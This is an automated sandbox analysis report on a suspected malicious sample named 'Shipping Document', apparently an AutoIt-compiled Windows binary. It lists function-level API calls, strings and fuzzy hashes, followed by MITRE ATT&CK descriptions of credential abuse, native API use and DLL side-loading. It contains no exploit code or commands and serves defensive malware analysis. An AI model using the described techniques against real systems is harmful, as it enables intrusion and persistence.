Function 010299BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00FC506B: __fread_nolock.LIBCMT ref: 00FC5089

_wcscmp.LIBCMT ref: 01029AAE
_wcscmp.LIBCMT ref: 01029AC1

Strings

FILE, xrefs: 010299FA

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: a4e0b19dddf2a0f0fce71e5712d99bea1c2f89d8410a4ac3eb545d475a4b7c85
Instruction ID: d17354d32d4b9aea3edbbe57eb9de891f2888ae2cffc9a8ba7061fbaf12e11ce
Opcode Fuzzy Hash: a4e0b19dddf2a0f0fce71e5712d99bea1c2f89d8410a4ac3eb545d475a4b7c85
Instruction Fuzzy Hash: 8D410671A4062ABADF219BA4CC46FEFBBFDDF45B14F000079F940E7181DA75AA4487A1

Function 01032882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01032892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010328C8

Strings

|, xrefs: 01032899

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 91371256fef38153db6bf90e527e1eadf6df0b28c7f6daee8553bbe906c2c86f
Instruction ID: 9edc70752d8bdab3d3501bd9d49c3e154c9d34cd5fae6605b1ae920351c3b79b
Opcode Fuzzy Hash: 91371256fef38153db6bf90e527e1eadf6df0b28c7f6daee8553bbe906c2c86f
Instruction Fuzzy Hash: 4631507180121AAFCF01EFA5CC86EEEBFB9FF08350F10406AF914A6165DB355A56DB60

Function 01046CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 01046D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01046DC2

Strings

static, xrefs: 01046D22

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e20cc9b6d9df66c141c016b13c909e80efdf025b367cb2954b897dd17c844a8c
Instruction ID: ada0f5a9cc694d3b58f3b8ee9effe493a3969a21ebd7b8886d4111241d756754
Opcode Fuzzy Hash: e20cc9b6d9df66c141c016b13c909e80efdf025b367cb2954b897dd17c844a8c
Instruction Fuzzy Hash: DB318FB1500605AFEB11AF28CC80BFB77A8FF49724F108529F9E597191DA36A891DB60

Function 01022D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01022E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01022E3B

Strings

0, xrefs: 01022DF9

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 1ac208322ea0849cf0e0160307c7942951ebc3fce475d6f54119404420edbdc5
Instruction ID: 3b84f1fe6832dc27c4ac97a2b9bc69427d11812dcff083570b64d6da2b083f71
Opcode Fuzzy Hash: 1ac208322ea0849cf0e0160307c7942951ebc3fce475d6f54119404420edbdc5
Instruction Fuzzy Hash: CD31E371600325ABEF649E8DC884BAEBFF9FF05300F1400A9EAC5971A0D7709580EB50

Function 01046943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 010469D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010469DB

Strings

Combobox, xrefs: 0104699D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: b73fd399eb641f5b48fe0a15c22031a095aa03600ad9a964ba39e230d95e241b
Instruction ID: 8d9e93543d0ff13aaafa4de6422c69d9c4a73a71afcaf418d5c318a728a20c55
Opcode Fuzzy Hash: b73fd399eb641f5b48fe0a15c22031a095aa03600ad9a964ba39e230d95e241b
Instruction Fuzzy Hash: DE11E9B56101096FEF129E18CCC0EFB37AEEB8A3A4F110135F99897291E6769C5087A0

Function 01046E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00FC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FC1D73
Part of subcall function 00FC1D35: GetStockObject.GDI32(00000011), ref: 00FC1D87
Part of subcall function 00FC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FC1D91

GetWindowRect.USER32(00000000,?), ref: 01046EE0
GetSysColor.USER32(00000012), ref: 01046EFA

Strings

static, xrefs: 01046EBD

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: e05a7fe7108e9851aa2e841d106ab3edd28a72b60f7b845282191de9bfcc83d6
Instruction ID: 53474c312a18da687908e3e15cb99596b38c42a1e8b17d61f4e27fb57f7ff63f
Opcode Fuzzy Hash: e05a7fe7108e9851aa2e841d106ab3edd28a72b60f7b845282191de9bfcc83d6
Instruction Fuzzy Hash: 5D2117B261020AAFDB14DFA8C985AEA7BF8FB09314F014669F995D2240E635E8619B50

Function 01046B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 01046C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 01046C20

Strings

edit, xrefs: 01046BF5

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: fc617fbdb6b6c751f55a2feb22eb991981f2bd43ac36ea686e893baf3777efec
Instruction ID: e0a02b5ff545e2fb2656b44e720a71f9bfb13baca6e2c7e1bd9703f22558e89e
Opcode Fuzzy Hash: fc617fbdb6b6c751f55a2feb22eb991981f2bd43ac36ea686e893baf3777efec
Instruction Fuzzy Hash: 3611BFB1500209ABEB515E68DC81AFB37A9EB06374F104728F9A1971D0D676DC909BA0

Function 01022E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01022F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 01022F30

Strings

0, xrefs: 01022F07

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 9b2e9d3b1e80b5523b9d801414427bca43b900a18f8f1e0f8f7ac8d323bdeac0
Instruction ID: c73b9e136482d78a8793880d156fd39b2536241fe88e021cda674c27f450a745
Opcode Fuzzy Hash: 9b2e9d3b1e80b5523b9d801414427bca43b900a18f8f1e0f8f7ac8d323bdeac0
Instruction Fuzzy Hash: 6811E671905134ABEBA0EADCDC44FAE7BE9EB01310F0500F1EAC4A72A0DBB1A904C795

Function 010324CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 01032520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01032549

Strings

<local>, xrefs: 01032511

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 87f39f98dbdeddc2433ce7b592e8e8726fefc1f030d9dcf7d4c0a7b1f9163ae6
Instruction ID: 9b7fce2afd564ce8ef6d162985f964ebeb40074fbef4e9251a980877d5146c99
Opcode Fuzzy Hash: 87f39f98dbdeddc2433ce7b592e8e8726fefc1f030d9dcf7d4c0a7b1f9163ae6
Instruction Fuzzy Hash: 481106B0500225BADB259F558C99FBBFFACFF46651F00816AF58686081D7706650C7F0

Function 010380A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0103830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,010380C8,?,00000000,?,?), ref: 01038322

inet_addr.WSOCK32(00000000), ref: 010380CB
htons.WSOCK32(00000000), ref: 01038108

Strings

255.255.255.255, xrefs: 010380E3

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 756a16bcb0deabc14e59fcd5982cf6aa872f61e112707971983acd219734cc87
Instruction ID: c6fd15d08da3e4c2a67fdb8eb97b024148909a6e19c3368fcb3a6d08dd868949
Opcode Fuzzy Hash: 756a16bcb0deabc14e59fcd5982cf6aa872f61e112707971983acd219734cc87
Instruction Fuzzy Hash: F811E574600206ABDB20DF68CC86FEEB368FF44310F10C69BFA5197281DA76A810C755

Function 010192E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

Part of subcall function 0101B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0101B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01019355

Strings

ListBox, xrefs: 0101931F
ComboBox, xrefs: 010192F4

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 4e776baad4f721ca18f0f2d9acaa162e771763abf8c9dc39524851c6baeb449c
Instruction ID: c8a3d157c7781cac4ceac45fb7016b5dc8c734b73def42c0d13cf97f343eaef6
Opcode Fuzzy Hash: 4e776baad4f721ca18f0f2d9acaa162e771763abf8c9dc39524851c6baeb449c
Instruction Fuzzy Hash: 8301F171A01216ABCB04FBA5CCA2DFE77A9BF06760B00065DF9B2572C5DF396908D750

Function 010191DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

Part of subcall function 0101B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0101B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 0101924D

Strings

ListBox, xrefs: 01019217
ComboBox, xrefs: 010191EC

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: b067752d1eca55d93c7eeee031149ec13ce34b8f6f89b1214d7d4825e1962ccc
Instruction ID: a2b44ff2af167cad63b3ef36c4ee732737c27836937290ad13c94ee0c9eeb758
Opcode Fuzzy Hash: b067752d1eca55d93c7eeee031149ec13ce34b8f6f89b1214d7d4825e1962ccc
Instruction Fuzzy Hash: FD014271E4120A6BCB04FBA0CEA2EFE77AC9F05740F10015DB98267281EE1D6F0C96B1

Function 01019264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

Part of subcall function 0101B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0101B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 010192D0

Strings

ListBox, xrefs: 0101929C
ComboBox, xrefs: 01019271

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 65f47d9d3c2d450b090c858b36acd19da6464f869e1023cd898d354c6fc97200
Instruction ID: 509372767e9a1d7ca992a9fc30ca0313f45ac33d086158b6dcf30736106392a8
Opcode Fuzzy Hash: 65f47d9d3c2d450b090c858b36acd19da6464f869e1023cd898d354c6fc97200
Instruction Fuzzy Hash: F0012671E4120A6BCB00FAA5CE92EFE77AC9F10750F14015DB98263285DA2D5F0C96B1

Function 010251CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 010251E8
_wcscmp.LIBCMT ref: 010251FA

Strings

#32770, xrefs: 010251F4

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: fb14bacbf205e0a03e08bb012dd4fc811093037cad311212581d17d8e8627115
Instruction ID: 07644d08d8fd743db838f3bc4844b9361f2b9f0c1f8c90819145ddcc01c676eb
Opcode Fuzzy Hash: fb14bacbf205e0a03e08bb012dd4fc811093037cad311212581d17d8e8627115
Instruction Fuzzy Hash: 4CE02B72A0423957D32095999C49B97F7ACEB41721F00005AF950D3040D565950587E0

Function 010181BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 010181CA

Part of subcall function 00FE3598: _doexit.LIBCMT ref: 00FE35A2

Strings

AutoIt, xrefs: 010181BE
Error allocating memory., xrefs: 010181C3

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: e985bc8593c82ce0cd0781f9826a0929c75092d1331bead0eaec2aedf6585bc7
Instruction ID: e0f2163a70135eb313dc36180f37ea71db9fa40599a673360a65bf46723f50b6
Opcode Fuzzy Hash: e985bc8593c82ce0cd0781f9826a0929c75092d1331bead0eaec2aedf6585bc7
Instruction Fuzzy Hash: 64D05B323C535932D26432BA6D0BFC67D884B05B55F04441ABB48995D38EEA558152DD

Function 00FFB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00FFB564: _memset.LIBCMT ref: 00FFB571

Part of subcall function 00FE0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FFB540,?,?,?,00FC100A), ref: 00FE0B89

IsDebuggerPresent.KERNEL32(?,?,?,00FC100A), ref: 00FFB544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FC100A), ref: 00FFB553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FFB54E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 29048dfa1d57ced926229ff448fe3d3fb708e6ec01d70d2451d3755d1d371841
Instruction ID: 40664510df01fee249e211ab69aa17f3e328725f7333b51b427221ac02521f66
Opcode Fuzzy Hash: 29048dfa1d57ced926229ff448fe3d3fb708e6ec01d70d2451d3755d1d371841
Instruction Fuzzy Hash: 4CE06DB46007158BD330DF29DA047527BE4AF00758F08892DE5C6C6255DBBDD444DB61

Function 01045BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01045BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01045C08

Part of subcall function 010254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0102555E

Strings

Shell_TrayWnd, xrefs: 01045BEE

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: dbb2f83a5bf12dcf1b8bc18204d28a6505cc8dfe6c07242f7a031db678b537e5
Instruction ID: 9aa54ff305ee12a4fc1501182b7dc3894b5676d13adabe0d4eed12fab843cb4c
Opcode Fuzzy Hash: dbb2f83a5bf12dcf1b8bc18204d28a6505cc8dfe6c07242f7a031db678b537e5
Instruction Fuzzy Hash: BCD0A975388312B7E334AA30AC4BFD76A10AB00B40F000828B385AA0C0C8E86800C344

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

